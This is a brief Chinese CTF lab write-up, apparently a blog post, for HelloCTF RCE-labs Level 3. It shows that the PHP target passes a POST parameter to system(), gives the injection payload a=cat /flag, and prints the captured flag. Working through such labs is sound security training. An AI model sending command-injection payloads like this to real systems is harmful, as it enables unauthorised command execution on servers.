HelloCTF [RCE-labs] Level 3 - 命令执行

开启靶场,打开链接:

这关代码跟level 1的区别是eval(_POST\['a'\]);变成了system(_POST['a']);

system() 函数会通过软连接执行你输入的系统命令

POST传参:a=cat /flag

成功得到flag:

NSSCTF{b10b3661-b382-467e-86be-4c374fdd3e5f}

相关推荐
m0_748233177 小时前
PHP版本演进:从7.x到8.x全解析
java·开发语言·php
zhengfei6117 小时前
精选的优秀法证分析工具和资源列表
开发语言·php
changyunkeji7 小时前
电缆敷设机就找长云科技
经验分享·科技
三水不滴8 小时前
Apache RocketMQ的原理与实践
经验分享·apache·rocketmq
REDcker8 小时前
RFC1918私有IP地址空间详解
网络协议·tcp/ip·php
孞㐑¥8 小时前
算法—链表
开发语言·c++·经验分享·笔记·算法
枷锁—sha8 小时前
【CTFshow-pwn系列】06_前置基础【pwn 035】详解:利用 SIGSEGV 信号处理机制
java·开发语言·安全·网络安全·信号处理
EverydayJoy^v^8 小时前
RH134学习进程——十一.管理网络安全
学习·安全·web安全
晚霞的不甘8 小时前
Flutter for OpenHarmony智能穿搭推荐:构建一个实用又美观的个性化衣橱助手
前端·经验分享·flutter·ui·前端框架
源代码•宸9 小时前
Golang面试题库(Interface、GMP)
开发语言·经验分享·后端·面试·golang·gmp·调度过程